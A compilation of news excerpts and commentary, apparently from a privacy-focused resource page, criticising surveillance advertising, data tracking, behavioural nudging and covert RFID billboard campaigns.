Resources

Why the Facebook ‘scandal’ impacts you more than you think

It’s not just the data you choose to share.

By now we all know the story: Facebook allowed apps on its social media platform which enabled a shady outfit called Cambridge Analytica to scrape the profiles of 87 million users, in order to serve up targeted ads to benefit the Trump election campaign in 2016.  More than 300,000 Australian users of Facebook were caught up in the data harvesting.

But serving up ads in a foreign election campaign is not the whole story.  Facebook, and other companies involved in data mining, are invading our privacy and harming us economically and socially, in ways that are only just starting to become clear.

And it’s not just the data you choose to share. The information you post is not the whole story.  It’s only the tip of the iceberg of data that Facebook has collected about you.

Every time you go online you leave a trail of digital breadcrumbs.  Facebook has been busily sweeping up those breadcrumbs, and using them to categorise and profile you.  Facebook obviously knows when you click on a Facebook ‘like’ button; but also, unless a web developer has gone out of their way to find tools to block them (as we have done for our Salinger Privacy blog), Facebook knows every time you simply look at a website that has a Facebook ‘like’ button somewhere on it.

So if you only post or ‘like’ stories about inspirational mountain climbers and funny cat videos, but also do things online that you don’t share with your family, friends or work colleagues (like looking at stories about abortion or dealing with infidelity, Googling how to manage anxiety or erectile dysfunction, whingeing about your employer in a chatroom, or spending hours reviewing dating profiles, gambling or shopping obsessively for shoes)  — Facebook has you pegged anyway.

Plus, Facebook obtains data from other sources which know about your offline purchases, to build an even richer picture of who you really are.  And of course, Facebook may have access to your address book, your location history, the contents of your private messages, and depending on your brand of phone, possibly even a history of your phone calls and text messages.

All that information is used to draw inferences and assumptions about your preferences, and predict your likely behaviour.  The results are then used to categorise, profile and ultimately target you, in a process usually described as ‘online behavioural advertising’.

It’s not ‘just ads’

The objective of online behavioural advertising is to predict your purchasing interests and drive a purchase decision.  So far, the same as any other advertising.  But online, the implications for us as individuals are much greater.

Facebook’s promise to advertisers is that it can show their ad to exactly who the advertiser wants, and exclude everybody else.

However, by allowing exclusion, the platform also allows discrimination.  Facebook has been caught allowing advertisers to target — and exclude — people on the basis of their ‘ethnic affinity’, amongst other social, demographic, racial and religious characteristics.  So a landlord with an ad for rental housing could prevent people profiled as ‘single mothers’ from ever seeing their ad.  An employer could prevent people identifying as Jewish from seeing a job ad.  A bank could prevent people categorised as African Americans from seeing an ad for a home loan.

Existing patterns of social exclusion, economic inequality and discrimination are further entrenched by micro-targeted advertising, which is hidden from public view and regulatory scrutiny.

Data boy. Mark Zuckerberg testifies in Washington. Image: Getty.

Predictive analytics can narrow or alter your life choices

Once we move beyond straight-up advertising and into predictive analytics, the impact on individual autonomy becomes more acute.  Big Data feeds machine learning, which finds patterns in the data, from which new rules (algorithms) are designed.  Algorithms predict how a person will behave, and suggest how they should be treated.

Algorithms can lead to price discrimination, like surge pricing based on Uber knowing how much phone battery life you have left.  Or market exclusion, like Woolworths only offering car insurance to customers it has decided are low risk, based on an assessment of the groceries they buy.

Banks have been predicting the risk of a borrower defaulting on a loan for decades, but now algorithms are also used to determine who to hire, predict when a customer is pregnant, and deliver targeted search results to influence how you vote.

Algorithms are also being used to predict the students at risk of failure, the prisoners at risk of re-offending, and who is at risk of suicide and then launching interventions accordingly.  However, even leaving aside the accuracy of those predictions, interventions are not necessarily well-intentioned.  It was revealed last year that Australian Facebook executives were touting to advertisers their ability to target psychologically vulnerable teenagers. 

Automated decision-making diminishes our autonomy, by narrowing or altering our market and life choices, in ways that are not clear to us.  People already in a position of economic or social disadvantage face the additional challenge of trying to disprove or beat an invisible algorithm.

In a predictive and pre-emptive world, empathy, forgiveness, rehabilitation, redemption, individual dignity, autonomy and free will are programmed out of our society.

Fiddling with users’ privacy settings on Facebook won’t fix anything.  If we want our lives to be ruled by human values and individual dignity, instead of by machines fed on questionable data, we need robust, enforced and globally effective privacy laws.

A new European privacy law commences later this month.  The obligations include that businesses and governments must offer understandable explanations of how their algorithms work, and allow people to seek human review of automated decision-making.  This is a step in the right direction, which Australia, the US and the rest of the world should follow.

825

An Apology for the Internet–from the people who built it

There have always been outsiders who criticized the tech industry — even if their concerns have been drowned out by the oohs and aahs of consumers, investors, and journalists. But today, the most dire warnings are coming from the heart of Silicon Valley itself. The man who oversaw the creation of the original iPhone believes the device he helped build is too addictive. The inventor of the World Wide Web fears his creation is being “weaponized.” Even Sean Parker, Facebook’s first president, has blasted social media as a dangerous form of psychological manipulation. “God only knows what it’s doing to our children’s brains,” he lamented recently.

If the tech industry likes to assume the trappings of a religion, complete with a quasi-messianic story of progress, the Church of Tech is now giving rise to a new sect of apostates, feverishly confessing their own sins. And the internet’s original sin, as these programmers and investors and CEOs make clear, was its business model.

The advertising model of the internet was different from anything that came before. Whatever you might say about broadcast advertising, it drew you into a kind of community, even if it was a community of consumers. The culture of the social-media era, by contrast, doesn’t draw you anywhere. It meets you exactly where you are, with your preferences and prejudices — at least as best as an algorithm can intuit them. “Microtargeting” is nothing more than a fancy term for social atomization — a business logic that promises community while promoting its opposite.

743

YouTube, YouTubers and You

745

Google and Facebook are watching our every move online

You may know that hidden trackers lurk on most websites you visit, soaking up your personal information. What you may not realize, though, is 76 percent of websites now contain hidden Google trackers, and 24 percent have hidden Facebook trackers, according to the Princeton Web Transparency & Accountability Project. The next highest is Twitter with 12 percent. It is likely that Google or Facebook are watching you on many sites you visit, in addition to tracking you when using their products. As a result, these two companies have amassed huge data profiles on each person, which can include your interests, purchases, search, browsing and location history, and much more. They then make your sensitive data profile available for invasive targeted advertising that can follow you around the Internet.

So how do we move forward from here? Don’t be fooled by claims of self-regulation, as any useful long-term reforms of Google and Facebook’s data privacy practices fundamentally oppose their core business models: hyper-targeted advertising based on more and more intrusive personal surveillance. Change must come from the outside. Unfortunately, we’ve seen relatively little from Washington. Congress and federal agencies need to take a fresh look at what can be done to curb these data monopolies. They first need to demand more algorithmic and privacy policy transparency, so people can truly understand the extent of how their personal information is being collected, processed and used by these companies. Only then can informed consent be possible. They also need to legislate that people own their own data, enabling real opt-outs. Finally, they need to restrict how data can be combined including being more aggressive at blocking acquisitions that further consolidate data power, which will pave the way for more competition in digital advertising. Until we see such meaningful changes, consumers should vote with their feet.

745

That Game on Your Phone May Be Tracking What You’re Watching on TV

At first glance, the gaming apps — with names like “Pool 3D,” “Beer Pong: Trickshot” and “Real Bowling Strike 10 Pin” — seem innocuous. One called “Honey Quest” features Jumbo, an animated bear.

Yet these apps, once downloaded onto a smartphone, have the ability to keep tabs on the viewing habits of their users — some of whom may be children — even when the games aren’t being played.

It is yet another example of how companies, using devices that many people feel they can’t do without, are documenting how audiences in a rapidly changing entertainment landscape are viewing television and commercials.

The apps use software from Alphonso, a start-up that collects TV-viewing data for advertisers. Using a smartphone’s microphone, Alphonso’s software can detail what people watch by identifying audio signals in TV ads and shows, sometimes even matching that information with the places people visit and the movies they see. The information can then be used to target ads more precisely and to try to analyze things like which ads prompted a person to go to a car dealership.

More than 250 games that use Alphonso software are available in the Google Play store; some are also available in Apple’s app store.

Some of the tracking is taking place through gaming apps that do not otherwise involve a smartphone’s microphone, including some apps that are geared toward children. The software can also detect sounds even when a phone is in a pocket if the apps are running in the background.

801

Over 400 of the World’s Most Popular Websites Record Your Every Keystroke

The idea of websites tracking users isn’t new, but research from Princeton University released last week indicates that online tracking is far more invasive than most users understand.

In the first installment of a series titled “No Boundaries,” three researchers from Princeton’s Center for Information Technology Policy (CITP) explain how third-party scripts that run on many of the world’s most popular websites track your every keystroke and then send that information to a third-party server.

Some highly-trafficked sites run software that records every time you click and every word you type. If you go to a website, begin to fill out a form, and then abandon it, every letter you entered in is still recorded, according to the researchers’ findings. If you accidentally paste something into a form that was copied to your clipboard, it’s also recorded. These scripts, or bits of code that websites run, are called “session replay” scripts. Session replay scripts are used by companies to gain insight into how their customers are using their sites and to identify confusing webpages. But the scripts don’t just aggregate general statistics, they record and are capable of playing back individual browsing sessions.

The scripts don’t run on every page, but are often placed on pages where users input sensitive information, like passwords and medical conditions. Most troubling is that the information session replay scripts collect can’t “reasonably be expected to be kept anonymous,” according to the researchers.

730

The Seemingly Pervasive Sinister Side of Algorythmic Screen Time for Children

Writer and artist James Bridle writes in Medium:

“Someone or something or some combination of people and things is using YouTube to systematically frighten, traumatize, and abuse children, automatically and at scale, and it forces me to question my own beliefs about the internet, at every level.

To begin: Kid’s YouTube is definitely and markedly weird. I’ve been aware of its weirdness for some time. Last year, there were a number of articles posted about the Surprise Egg craze. Surprise Eggs videos depict, often at excruciating length, the process of unwrapping Kinder and other egg toys. That’s it, but kids are captivated by them. There are thousands and thousands of these videos and thousands and thousands, if not millions, of children watching them. […] What I find somewhat disturbing about the proliferation of even (relatively) normal kids videos is the impossibility of determining the degree of automation which is at work here; how to parse out the gap between human and machine.”

Sapna Maheshwari also explores in The New York Times:

“Parents and children have flocked to Google-owned YouTube Kids since it was introduced in early 2015. The app’s more than 11 million weekly viewers are drawn in by its seemingly infinite supply of clips, including those from popular shows by Disney and Nickelodeon, and the knowledge that the app is supposed to contain only child-friendly content that has been automatically filtered from the main YouTube site. But the app contains dark corners, too, as videos that are disturbing for children slip past its filters, either by mistake or because bad actors have found ways to fool the YouTube Kids algorithms. In recent months, parents like Ms. Burns have complained that their children have been shown videos with well-known characters in violent or lewd situations and other clips with disturbing imagery, sometimes set to nursery rhymes.”

Very horrible and creepy.

822

How Silicon Valley divided society and made everyone raging mad

“Silicon Valley’s utopians genuinely but mistakenly believe that more information and connection makes us more analytical and informed. But when faced with quinzigabytes of data, the human tendency is to simplify things. Information overload forces us to rely on simple algorithms to make sense of the overwhelming noise. This is why, just like the advertising industry that increasingly drives it, the internet is fundamentally an emotional medium that plays to our base instinct to reduce problems and take sides, whether like or don’t like, my guy/not my guy, or simply good versus evil. It is no longer enough to disagree with someone, they must also be evil or stupid…

Nothing holds a tribe together like a dangerous enemy. That is the essence of identity politics gone bad: a universe of unbridgeable opinion between opposing tribes, whose differences are always highlighted, exaggerated, retweeted and shared. In the end, this leads us to ever more distinct and fragmented identities, all of us armed with solid data, righteous anger, a gutful of anger and a digital network of likeminded people. This is not total connectivity; it is total division.”

782

“Are you happy now? The uncertain future of emotion analytics”

Elise Thomas writes at Hopes & Fears:

“Right now, in a handful of computing labs scattered across the world, new software is being developed which has the potential to completely change our relationship with technology. Affective computing is about creating technology which recognizes and responds to your emotions. Using webcams, microphones or biometric sensors, the software uses a person’s physical reactions to analyze their emotional state, generating data which can then be used to monitor, mimic or manipulate that person’s emotions.”

Corporations spend billions each year trying to build “authentic” emotional connections to their target audiences. Marketing research is one of the most prolific research fields around, conducting thousands of studies on how to more effectively manipulate consumers’ decision-making. Advertisers are extremely interested in affective computing and particularly in a branch known as emotion analytics, which offers unprecedented real-time access to consumers’ emotional reactions and the ability to program alternative responses depending on how the content is being received.

For example, if two people watch an advertisement with a joke and only one person laughs, the software can be programmed to show more of the same kind of advertising to the person who laughs while trying different sorts of advertising on the person who did not laugh to see if it’s more effective. In essence, affective computing could enable advertisers to create individually-tailored advertising en masse.”

“Say 15 years from now a particular brand of weight loss supplements obtains a particular girl’s information and locks on. When she scrolls through her Facebook, she sees pictures of rail-thin celebrities, carefully calibrated to capture her attention. When she turns on the TV, it automatically starts on an episode of “The Biggest Loser,” tracking her facial expressions to find the optimal moment for a supplement commercial. When she sets her music on shuffle, it “randomly” plays through a selection of the songs which make her sad. This goes on for weeks.

Now let’s add another layer. This girl is 14, and struggling with depression. She’s being bullied in school. Having become the target of a deliberate and persistent campaign by her technology to undermine her body image and sense of self-worth, she’s at risk of making some drastic choices.”

855

What Makes You Click (2016)

“The biggest psychological experiment ever is being conducted, and we’re all taking part in it: every day, a billion people are tested online. Which ingenious tricks and other digital laws ensure that we fill our online shopping carts to the brim, or stay on websites as long as possible? Or vote for a particular candidate?

The bankruptcies of department stores and shoe shops clearly show that our buying behaviour is rapidly shifting to the Internet. An entirely new field has arisen, of ‘user experience’ architects and ‘online persuasion officers’. How do these digital data dealers use, manipulate and abuse our user experience? Not just when it comes to buying things, but also with regards to our free time and political preferences.

Aren’t companies, which are running millions of tests at a time, miles ahead of science and government, in this respect? Now the creators of these digital seduction techniques, former Google employees among them, are themselves arguing for the introduction of an ethical code. What does it mean, when the conductors of experiments themselves are asking for their power and possibilities to be restricted?”

1180
Stare Into The Lights My Pretties

“Your browsing history alone can give away your identity”

“Researchers at Stanford and Princeton universities have found a way to connect the dots between people’s private online activity and their Twitter accounts—even for people who have never tweeted.

When the team tested the technique on 400 real people who submitted their browsing history, they were able to correctly pick out the volunteers’ Twitter profiles nearly three-quarters of the time.

Here’s how the de-anonymization system works: The researchers figured that a person is more likely to click a link that was shared on social media by a friend—or a friend of a friend—than any other random link on the internet. (Their model controls for the baseline popularity of each website.) With that in mind, and the details of an anonymous person’s browser history in hand, the researchers can compute the probability that any one Twitter user created that browsing history. People’s basic tendency to follow links they come across on Twitter unmasks them—and it usually takes less than a minute.

“You can even be de-anonymized if you just browse and follow people, without actually sharing anything.”

789

“Creepy new website makes its monitoring of your online behaviour visible”

“If YOU think you are not being analysed while browsing websites, it could be time to reconsider. A creepy new website called clickclickclick has been developed to demonstrate how our online behaviour is continuously measured.

The site, which observes and comments on your behaviour in detail, and is not harmful to your computer, contains nothing but a white screen and a large green button. From the minute you visit the website, it begins detailing your actions on the screen in real-time.

The site also encourages users to turn on their audio, which offers the even more disturbing experience of having an English voice comment about your behaviour.

Designer Roel Wouters said the experiment was aimed to remind people about the serious themes of big data and privacy. “It seemed fun to thematise this in a simple and lighthearted way,” he said.

Fellow designer Luna Maurer said the website her own experiences with the internet had helped with the project. “I am actually quite internet aware, but I am still very often surprised that after I watched something on a website, a second later I get instantly personalised ads,” she said.”

723

Data surveillance is all around us, and it’s going to change our behaviour

“Increasing aspects of our lives are now recorded as digital data that are systematically stored, aggregated, analysed, and sold. Despite the promise of big data to improve our lives, all encompassing data surveillance constitutes a new form of power that poses a risk not only to our privacy, but to our free will.

A more worrying trend is the use of big data to manipulate human behaviour at scale by incentivising “appropriate” activities, and penalising “inappropriate” activities. In recent years, governments in the UK, US, and Australia have been experimenting with attempts to “correct” the behaviour of their citizens through “nudge units”.”

Nudge units: “In ways you don’t detect [corporations and governments are] subtly influencing your decisions, pushing you towards what it believes are your (or its) best interests, exploiting the biases and tics of the human brain uncovered by research into behavioural psychology. And it is trying this in many different ways on many different people, running constant trials of different unconscious pokes and prods, to work out which is the most effective, which improves the most lives, or saves the most money. Preferably, both.”

“In his new book Inside the Nudge Unit, published this week in Britain, Halpern explains his fascination with behavioural psychology.

”Our brains weren’t made for the day-to-day financial judgments that are the foundation of modern economies: from mortgages, to pensions, to the best buy in a supermarket. Our thinking and decisions are fused with emotion.”

There’s a window of opportunity for governments, Halpern believes: to exploit the gaps between perception, reason, emotion and reality, and push us the “right” way.

He gives me a recent example of BI’s work – they were looking at police recruitment, and how to get a wider ethnic mix.

Just before applicants did an online recruitment test, in an email sending the link, BI added a line saying “before you do this, take a moment to think about why joining the police is important to you and your community”.

There was no effect on white applicants. But the pass rate for black and minority ethnic applicants moved from 40 to 60 per cent.

”It entirely closes the gap,” Halpern says. “Absolutely amazing. We thought we had good grounds in the [scientific research] literature that such a prompt might make a difference, but the scale of the difference was extraordinary.

Halpern taught social psychology at Cambridge but spent six years in the Blair government’s strategy unit. An early think piece on behavioural policy-making was leaked to the media and caused a small storm – Blair publicly disowned it and that was that. Halpern returned to academia, but was lured back after similar ideas started propagating through the Obama administration, and Cameron was persuaded to give it a go.

Ministers tend not to like it – once, one snapped, “I didn’t spend a decade in opposition to come into government to run a pilot”, but the technique is rife in the digital commercial world, where companies like Amazon or Google try 20 different versions of a web page.

Governments and public services should do it too, Halpern says. His favourite example is Britain’s organ donor register. They tested eight alternative online messages prompting people to join, including a simple request, different pictures, statistics or conscience-tweaking statements like “if you needed an organ transplant would you have one? If so please help others”.

It’s not obvious which messages work best, even to an expert. The only way to find out is to test them. They were surprised to find that the picture (of a group of people) actually put people off, Halpern says.

In future they want to use demographic data to personalise nudges, Halpern says. On tax reminder notices, they had great success putting the phrase “most people pay their tax on time” at the top. But a stubborn top 5 per cent, with the biggest tax debts, saw this reminder and thought, “Well, I’m not most people”.

This whole approach raises ethical issues. Often you can’t tell people they’re being experimented on – it’s impractical, or ruins the experiment, or both.

”If we’re trying to find the best way of saying ‘don’t drop your litter’ with a sign saying ‘most people don’t drop litter’, are you supposed to have a sign before it saying ‘caution you are about to participate in a trial’?

”Where should we draw the line between effective communication and unacceptable ‘PsyOps’ or propaganda?”

722

“Yahoo has a creepy plan for advertising billboards to spy on you”

Yahoo has filed a patent for a type of smart billboard that would collect people’s information and use it to deliver targeted ad content in real-time.

To achieve that functionality, the billboards would use a variety of sensor systems, including cameras and proximity technology, to capture real-time audio, video and even biometric information about potential target audiences.

But the tech company doesn’t just want to know about a passing vehicle. It also wants to know who the occupants are inside of it.

That’s why Yahoo is prepared to cooperate with cell towers and telecommunications companies to learn as much as possible about each vehicle’s occupants.”

“Various types of data (e.g., cell tower data, mobile app location data, image data, etc.) can be used to identify specific individuals in an audience in position to view advertising content. Similarly, vehicle navigation/tracking data from vehicles equipped with such systems could be used to identify specific vehicles and/or vehicle owners. Demographic data (e.g., as obtained from a marketing or user database) for the audience can thus be determined for the purpose of, for example, determining whether and/or the degree to which the demographic profile of the audience corresponds to a target demographic.”

739

Is Facebook eavesdropping on your phone conversations?

754

Facebook is monitoring your reactions to serve you ads, warn Belgian Police

Belgian police have asked citizens to shun Facebook’s “Reactions” buttons to protect their privacy. In February, five new “Reaction” buttons were added next to the “Like” button to allow people to display responses such as sad, wow, angry, love and haha. According to reports, police said Facebook is able to use the tool to tell when people are likely to be in a good mood — and then decide when is the best time to show them ads. “The icons help not only express your feelings, they also help Facebook assess the effectiveness of the ads on your profile,” a post on Belgian’s official police website read.

“By limiting the number of icons to six, Facebook is counting on you to express your thoughts more easily so that the algorithms that run in the background are more effective,” the post continues. “By mouse clicks you can let them know what makes you happy. “So that will help Facebook find the perfect location, on your profile, allowing it to display content that will arouse your curiosity but also to choose the time you present it. If it appears that you are in a good mood, it can deduce that you are more receptive and able to sell spaces explaining advertisers that they will have more chance to see you react.”

630

Marketers hungry for data from wearable devices

“In the future the data procured from smartwatches might be much more valuable than what is currently available from laptop and mobile users,” reports David Curry, raising the possibility that stores might someday use your past Google searches to alert you when they’re selling a cheaper product.”

711

Why movie trailers now begin with five-second ads for themselves

Emphasis added.

“Jason Bourne takes off his jacket, punches a man unconscious, looks forlornly off camera, and then a title card appears. The ad — five seconds of action — is a teaser for the full Jason Bourne trailer (video), which immediately follows the teaser. In fact, the micro-teaser and trailer are actually part of the same video, the former being an intro for the latter. The trend is the latest example of metahype, a marketing technique in which brands promote their advertisements as if they’re cultural events unto themselves.

[…]

“Last year, the studio advertised the teaser for Ant-Man with a ten-second cut of the footage reduced to an imperceptive scale. […] But where previous metahype promoted key dates in a marketing campaign—like official trailer releases and fan celebrations—the burgeoning trend of teasers within trailers exist purely to retain the viewer’s attention in that exact moment. The teaser within the trailer speaks to a moment in which we have so many distractions and choices that marketers must sell us on giving a trailer three minutes of our time. This practice isn’t limited to movie trailers, though. Next time you’re on Facebook, pay attention to how the popular videos in your newsfeed are edited. Is the most interesting image the first thing you see? And does that trick get you to stop scrolling and watch?”

694

“Dog Grabs Shoppers’ Attention Via Interactive Billboards”

An example of advertising meets personalisation for good-old manipulative marketing outcomes. Please excuse the barrage of branding/product mentions throughout the copy and media materials.

Also note how the point of deploying the technology is entirely covert and great lengths are gone to embed hidden tracking systems into the physical environment. Persons subjected to the advertising are also not told that they’re accepting a tracking device for the purposes of such advertising where the content displayed is specifically for tailored emotional manipulation much more than ordinary advertising. Persons later question if the experience was a “coincidence,” etc.

Emphasis added:

For two weeks this past spring, some shoppers at the Westfield Stratford shopping mall in the United Kingdom were followed by a homeless dog appearing on electronic billboards. The roving canine, named Barley, was part of an RFID-based advertisement campaign conducted by Ogilvy on behalf of the Battersea Dogs and Cats Home, a rehabilitation and adoption organization for stray animals. The enabling technology was provided by Intellifi, and was installed by U.K.-based RFID consultancy RFIDiom.

Ogilvy’s ad campaign was the brainchild of William Godfrey, an “experience designer” at the advertising agency. Ogilvy is a fan of Battersea—and of pets in general—Godfrey explains, and he thought about how technology could be used to bring the plight of homeless animals directly to the public in a memorable way. “I had the idea that it would be lovely to digitalize dogs,” he says, and radio frequency identification seemed the best technology to make it appear that a digitalized canine was following people in the way that an actual stray dog might do. Ogilvy had considered the use of other technologies, such as cameras, but ultimately decided that RFID would make the process seamless and automatic.

[…]

Eric Jones, RFIDiom’s managing director, says he, too, is an animal lover. When Ogilvy suggested a campaign using RFID to put images of pets in front of shoppers on an individualized basis, Jones was up to the task, despite the short (two-week) deadline. It was a bit different than the company’s typical RFID deployments (which include document-tracking, supply chain management and industrial traceability solutions), and he says he and his engineers enjoy a good challenge.
 

The RFID system worked this way: representatives of the Battersea Dogs and Cats Home, including Fishersmith herself, greeted shoppers at the entrance, offering them an RFID-tagged Battersea brochure if they seemed especially interested in pets. To better judge this, one individual stood at the entrance holding a dog or cat from the shelter. Every shopper who walked up to the animal to get a closer look at or pet it received a brochure. Attached to that brochure was a Smartrac Frog 3D RFID inlay encoded with a unique ID number that the system would recognize. That ID was not connected to any data about the individual carrying the brochure, since the company’s intention was that shoppers would remain anonymous.

Consumers were not told that the brochure had any special technology built into it. Therefore, an individual could be surprised when the advertising video changed to a dog—Barley—when he or she approached the billboard.

An Intellifi Smartspot RFID reader.

A total of seven digital billboards, located in or near the mall, were RFID-enabled, according to Matthijs van der Weg, Intellifi’s CEO.

An Intellifi reader (known as a Smartspot), with as many as six antennas built into it, was installed at each of the seven billboard sites, and some of the readers were also fitted with an additional external Intellifi reader antenna. The reader detected the zone in which an individual was located. Each antenna supported two to three zones, with a single zone’s radius equal to a distance of three steps that a shopper might move while walking. The reader forwarded the brochures’ unique IDs and signal information to Intellifi’s Brain software on the server, which then calculated each shopper’s location relative to that particular billboard.

The location data was provided to Ogilvy’s content-management software, which displayed an image of a dog whose movements corresponded to that shopper’s location. If the person holding the RFID-tagged brochure was walking to the left, the dog followed in that direction. As he or she approached the screen, the animal on the video seemed to approach as well.

The system also tracked which screens a shopper had already passed. This allowed the billboards to play only video images that he or she had not already seen.

Some reader installations were easier than others, Jones says. At some billboards, for instance, there was a power source to which the reader could be connected, while in other cases RFIDiom installed standalone power units to energize the readers. It was important that the hardware not be apparent, he adds, and RFIDiom made a few creative adjustments to ensure that the readers, antennas and power units were obscured.

In some cases, the readers were painted green and hung in trees or placed in bushes near the screen, while others were attached to lampposts. One RFID-enabled billboard was located on a nearby footbridge that some shoppers traversed to reach the mall. In this case, RFIDiom installed flowerbeds with false bottoms and buried the readers in with the flowers.

 
During the two weeks in April, the system tracked hundreds of shoppers. “People did a bit of a double-take,” Fishersmith says. “At first, they weren’t sure if it was just a coincidence that the dog seemed to be following them.” In some cases, they approached the Battersea representatives in front of the mall to ask if their experience had just been a coincidence, and many wanted to repeat the process.

Altogether, Godfrey says, shoppers carried about 700 brochures throughout the mall. The campaign’s successful result, he adds, “has put RFID on the radar” for other Ogilvy engineers. “I don’t think it will be the last time” Ogilvy will use such technology, he predicts, noting that the specific campaign will need to be one that benefits from the sense of having content follow an individual (in the same way Barley did).

“The main thing is that we proved it could be done,” Jones says, speaking on behalf of Intellifi and RFIdiom.

Here is some footage of people “interacting” with the system as part of the marketing campaign. The footage is basically an ad, it’s from the campaign’s website:
 

1079

What Stores See When They Spy on Shoppers

738